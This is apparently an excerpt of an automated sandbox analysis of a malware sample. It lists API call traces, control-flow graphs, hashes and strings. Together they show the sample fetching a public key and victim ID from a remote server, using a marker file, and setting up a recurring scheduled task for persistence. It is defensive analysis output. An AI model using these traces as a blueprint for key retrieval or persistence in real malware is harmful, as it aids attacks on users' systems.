                                                                                                                            • _memmove.LIBCMT ref: 0047E838
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0047E90A
                                                                                                                            • lstrcatW.KERNEL32(?,&first=false), ref: 0047E93D
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0047E954
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0047E96F
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047E98C
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047E9A3
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0047E9CD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F3
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F6
                                                                                                                            • _strstr.LIBCMT ref: 0047EA36
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EA59
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EA74
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EA82
                                                                                                                            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0047EA92
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EAA4
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EABA
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EAC8
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 0047EAE3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EB5B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EB7C
                                                                                                                            • _malloc.LIBCMT ref: 0047EB86
                                                                                                                            • _memset.LIBCMT ref: 0047EB94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0047EBAE
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EBB6
                                                                                                                            • _strstr.LIBCMT ref: 0047EBDA
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EC00
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EC24
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EC32
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0047EC3E
                                                                                                                            • lstrlenA.KERNEL32(","id":"), ref: 0047EC51
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EC6D
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EC7F
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EC93
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 0047ECB3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047ED2A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047ED4B
                                                                                                                            • _malloc.LIBCMT ref: 0047ED55
                                                                                                                            • _memset.LIBCMT ref: 0047ED63
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0047ED7D
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047ED85
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0047EDA3
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0047EDAE
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EDD3
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EDF7
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EE05
                                                                                                                            • _free.LIBCMT ref: 0047EE15
                                                                                                                            • _free.LIBCMT ref: 0047EE22
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EF61
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EFBF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                            • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                            • API String ID: 704684250-3586605218
                                                                                                                            • Opcode ID: 550fea69011982aa702f9df1563227c58af4d62476bb8d6052ff34b4bb06d851
                                                                                                                            • Instruction ID: 6f11c0338a18957c166e7607d9db9ca5d7d4876b38839decbc162d0932cf860f
                                                                                                                            • Opcode Fuzzy Hash: 550fea69011982aa702f9df1563227c58af4d62476bb8d6052ff34b4bb06d851
                                                                                                                            • Instruction Fuzzy Hash: 0542F471508341ABDB20EF25CC49BDF7BE8BF59308F00495EF48997292DB789509CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1213 46d240-46d274 CoInitialize 1214 46d276-46d278 1213->1214 1215 46d27d-46d2dd CoInitializeSecurity call 474690 CoCreateInstance 1213->1215 1216 46da8e-46da92 1214->1216 1222 46d2e3-46d3ca VariantInit * 4 VariantClear * 4 1215->1222 1223 46da3c-46da44 CoUninitialize 1215->1223 1218 46da94-46da9c call 482587 1216->1218 1219 46da9f-46dab1 1216->1219 1218->1219 1229 46d3e2-46d3fe call 46b140 1222->1229 1230 46d3cc-46d3dd CoUninitialize 1222->1230 1225 46da69-46da6d 1223->1225 1227 46da6f-46da77 call 482587 1225->1227 1228 46da7a-46da8a 1225->1228 1227->1228 1228->1216 1236 46d404 1229->1236 1237 46d400-46d402 1229->1237 1230->1225 1238 46d406-46d424 call 46b1d0 1236->1238 1237->1238 1242 46d426-46d437 CoUninitialize 1238->1242 1243 46d43c-46d451 call 46b140 1238->1243 1242->1225 1247 46d457 1243->1247 1248 46d453-46d455 1243->1248 1249 46d459-46d494 call 46b1d0 1247->1249 1248->1249 1255 46d496-46d4a7 CoUninitialize 1249->1255 1256 46d4ac-46d4c2 1249->1256 1255->1225 1259 46da2a-46da37 1256->1259 1260 46d4c8-46d4dd call 46b140 1256->1260 1259->1223 1264 46d4e3 1260->1264 1265 46d4df-46d4e1 1260->1265 1266 46d4e5-46d508 call 46b1d0 1264->1266 1265->1266 1266->1259 1271 46d50e-46d524 1266->1271 1271->1259 1273 46d52a-46d542 1271->1273 1273->1259 1276 46d548-46d55e 1273->1276 1276->1259 1278 46d564-46d57c 1276->1278 1278->1259 1281 46d582-46d59b 1278->1281 1281->1259 1283 46d5a1-46d5b6 call 46b140 1281->1283 1286 46d5bc 1283->1286 1287 46d5b8-46d5ba 1283->1287 1288 46d5be-46d5e1 call 46b1d0 1286->1288 1287->1288 1288->1259 1293 46d5e7-46d5fd 1288->1293 1293->1259 1295 46d603-46d626 1293->1295 1295->1259 1298 46d62c-46d651 1295->1298 1298->1259 1301 46d657-46d666 1298->1301 1301->1259 1303 46d66c-46d681 call 46b140 1301->1303 1306 46d687 1303->1306 1307 46d683-46d685 1303->1307 1308 46d689-46d6a3 call 46b1d0 1306->1308 1307->1308 1308->1259 1312 46d6a9-46d6be call 46b140 1308->1312 1315 46d6c4 1312->1315 1316 46d6c0-46d6c2 1312->1316 1317 46d6c6-46d6e0 call 46b1d0 1315->1317 1316->1317 1317->1259 1321 46d6e6-46d6f4 1317->1321 1321->1259 1323 46d6fa-46d70f call 46b140 1321->1323 1326 46d715 1323->1326 1327 46d711-46d713 1323->1327 1328 46d717-46d731 call 46b1d0 1326->1328 1327->1328 1328->1259 1332 46d737-46d74c call 46b140 1328->1332 1335 46d752 1332->1335 1336 46d74e-46d750 1332->1336 1337 46d754-46d76e call 46b1d0 1335->1337 1336->1337 1337->1259 1341 46d774-46d7ce call 483aaf call 483551 call 4828e0 call 472c40 call 472900 1337->1341 1352 46d7d2-46d7e3 call 46b140 1341->1352 1353 46d7d0 1341->1353 1356 46d7e5-46d7e7 1352->1356 1357 46d7e9 1352->1357 1353->1352 1358 46d7eb-46d819 call 46b1d0 call 473210 1356->1358 1357->1358 1358->1259 1365 46d81f-46d835 1358->1365 1365->1259 1367 46d83b-46d85e 1365->1367 1367->1259 1370 46d864-46d889 1367->1370 1370->1259 1373 46d88f-46d8ab call 46b140 1370->1373 1376 46d8b1 1373->1376 1377 46d8ad-46d8af 1373->1377 1378 46d8b3-46d8cd call 46b1d0 1376->1378 1377->1378 1382 46d8cf-46d8d8 1378->1382 1383 46d8dd-46d8f2 call 46b140 1378->1383 1382->1259 1387 46d8f4-46d8f6 1383->1387 1388 46d8f8 1383->1388 1389 46d8fa-46d91d call 46b1d0 1387->1389 1388->1389 1389->1259 1394 46d923-46d98d call 46b400 VariantInit * 2 call 46b140 1389->1394 1399 46d993 1394->1399 1400 46d98f-46d991 1394->1400 1401 46d995-46da0e call 46b1d0 VariantClear * 3 1399->1401 1400->1401 1405 46da46-46da67 CoUninitialize 1401->1405 1406 46da10-46da27 call 48052a 1401->1406 1405->1225 1406->1259
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046D26C
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0046D28F
                                                                                                                            • CoCreateInstance.OLE32(0053506C,00000000,00000001,00534FEC,?,?,00000000,000000FF), ref: 0046D2D5
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D2F0
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D309
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D322
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D33B
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D397
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D3A4
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D3B1
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D3C2
                                                                                                                            • CoUninitialize.OLE32 ref: 0046D3D5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                            • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                            • API String ID: 2496729271-1738591096
                                                                                                                            • Opcode ID: b0266b6b185dcf8f1dc3a9f9e868f0855bdcfb0f0f1d29deba6f4c7e06aafca2
                                                                                                                            • Instruction ID: 37aa648fc3d232e7746c5c1b5da7931a9f3c2bfbc162019e14d9173ef1701682
                                                                                                                            • Opcode Fuzzy Hash: b0266b6b185dcf8f1dc3a9f9e868f0855bdcfb0f0f1d29deba6f4c7e06aafca2
                                                                                                                            • Instruction Fuzzy Hash: 4B527F70E00219DFDB10DFA5C848FAEBBB5FF49304F148199E505AB251EB34AD46CBA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00470FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00471010
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00471026
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,004AF299,?,?,?,?,?,?,?,004AF299,?,00568238,?), ref: 00490F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0047103B
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00471051
                                                                                                                            • lstrlenA.KERNEL32(?,00000000), ref: 00471059
                                                                                                                            • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00471064
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0047107A
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00471099
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004710AB
                                                                                                                            • _memset.LIBCMT ref: 004710CA
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004710DE
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004710F0
                                                                                                                            • _malloc.LIBCMT ref: 00471100
                                                                                                                            • _memset.LIBCMT ref: 0047110B
                                                                                                                            • _sprintf.LIBCMT ref: 0047112E
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0047113C
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 00471154
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0047115F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 2451520719-213608013
                                                                                                                            • Opcode ID: 337f0b06704204d818d9c72c8b40795410c290ec994badc7db54cf683149477d
                                                                                                                            • Instruction ID: ed9111a454036d3bae026f39e1e3ec94eefc035da51b3ddd21e59bd1e15e8b86
                                                                                                                            • Opcode Fuzzy Hash: 337f0b06704204d818d9c72c8b40795410c290ec994badc7db54cf683149477d
                                                                                                                            • Instruction Fuzzy Hash: 8751A171D40219ABDF20EBA4DC46FEFBBB8FF15704F100026FA05B6291D7795A058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00471AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471ACA
                                                                                                                              • Part of subcall function 00471AB0: DispatchMessageW.USER32(?), ref: 00471AE0
                                                                                                                              • Part of subcall function 00471AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471AEE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 0046F900
                                                                                                                            • _memmove.LIBCMT ref: 0046F9EA
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0046FA51
                                                                                                                            • _memmove.LIBCMT ref: 0046FADA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 273148273-0
                                                                                                                            • Opcode ID: 6359b142e61149fdb8bd1f57c6ee7f01f497378491be98367a76445763f0bcf5
                                                                                                                            • Instruction ID: dac4e0bd32de0cfc4598dfd4c0ef62a9dbca906edc8011c5c7cb04596156aa80
                                                                                                                            • Opcode Fuzzy Hash: 6359b142e61149fdb8bd1f57c6ee7f01f497378491be98367a76445763f0bcf5
                                                                                                                            • Instruction Fuzzy Hash: 6652D170D00208DBCF10DFA8D985BDEB7F4BF05308F10856EE459A7251E779AA49CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1714 46e870-46e8d6 call 4756d0 CryptAcquireContextW 1717 46e8d8-46e8e4 call 490eca 1714->1717 1718 46e8e9-46e901 CryptCreateHash 1714->1718 1717->1718 1720 46e914-46e930 CryptHashData 1718->1720 1721 46e903-46e90f call 490eca 1718->1721 1723 46e932-46e93e call 490eca 1720->1723 1724 46e943-46e961 CryptGetHashParam 1720->1724 1721->1720 1723->1724 1726 46e974-46e9a6 call 480be4 call 48b420 CryptGetHashParam 1724->1726 1727 46e963-46e96f call 490eca 1724->1727 1733 46e9a8-46e9b4 call 490eca 1726->1733 1734 46e9b9-46e9bb 1726->1734 1727->1726 1733->1734 1736 46e9c0-46e9c3 1734->1736 1737 46e9c5-46e9df call 4804a6 1736->1737 1738 46ea10-46ea31 call 482110 CryptDestroyHash CryptReleaseContext 1736->1738 1745 46e9f2-46e9f5 1737->1745 1746 46e9e1-46e9f0 call 473ea0 1737->1746 1743 46ea33-46ea3b call 482587 1738->1743 1744 46ea3e-46ea50 1738->1744 1743->1744 1749 46e9f8-46e9fd 1745->1749 1746->1736 1749->1749 1750 46e9ff-46ea0e call 473ea0 1749->1750 1750->1736
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0055FCA4,00000000,00000000), ref: 0046E8CE
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E8E4
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,004AF299,?,?,?,?,?,?,?,004AF299,?,00568238,?), ref: 00490F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0046E8F9
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E90F
                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0046E928
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E93E
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0046E95D
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E96F
                                                                                                                            • _memset.LIBCMT ref: 0046E98E
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0046E9A2
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E9B4
                                                                                                                            • _sprintf.LIBCMT ref: 0046E9D3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 1084002244-213608013
                                                                                                                            • Opcode ID: 5ab1ca20d477ce8f242366f124f0b2968f15a58a9a2f932d530490049c755648
                                                                                                                            • Instruction ID: 5e26b0c935ff1b54ae210d3a0da95a3588f9070baa3643effd86ce1a62566d7c
                                                                                                                            • Opcode Fuzzy Hash: 5ab1ca20d477ce8f242366f124f0b2968f15a58a9a2f932d530490049c755648
                                                                                                                            • Instruction Fuzzy Hash: 595172B1D40209ABDF11DFA1CC46FEFBBB8EF15704F10452AF501B6181E7796A058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1755 46eaa0-46eb09 call 4756d0 CryptAcquireContextW 1758 46eb1c-46eb34 CryptCreateHash 1755->1758 1759 46eb0b-46eb17 call 490eca 1755->1759 1761 46eb36-46eb42 call 490eca 1758->1761 1762 46eb47-46eb56 CryptHashData 1758->1762 1759->1758 1761->1762 1764 46eb58-46eb64 call 490eca 1762->1764 1765 46eb69-46eb87 CryptGetHashParam 1762->1765 1764->1765 1767 46eb9a-46ebcc call 480be4 call 48b420 CryptGetHashParam 1765->1767 1768 46eb89-46eb95 call 490eca 1765->1768 1774 46ebce-46ebda call 490eca 1767->1774 1775 46ebdf 1767->1775 1768->1767 1774->1775 1777 46ebe1-46ebe4 1775->1777 1778 46ebe6-46ec00 call 4804a6 1777->1778 1779 46ec38-46ec67 call 482110 CryptDestroyHash CryptReleaseContext 1777->1779 1784 46ec02-46ec11 call 473ea0 1778->1784 1785 46ec13-46ec19 1778->1785 1784->1777 1786 46ec20-46ec25 1785->1786 1786->1786 1788 46ec27-46ec36 call 473ea0 1786->1788 1788->1777
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0055FCA4,00000000,00000000,00000000,?), ref: 0046EB01
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB17
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,004AF299,?,?,?,?,?,?,?,004AF299,?,00568238,?), ref: 00490F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0046EB2C
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB42
                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0046EB4E
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB64
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0046EB83
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB95
                                                                                                                            • _memset.LIBCMT ref: 0046EBB4
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0046EBC8
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EBDA
                                                                                                                            • _sprintf.LIBCMT ref: 0046EBF4
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 0046EC44
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0046EC4F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
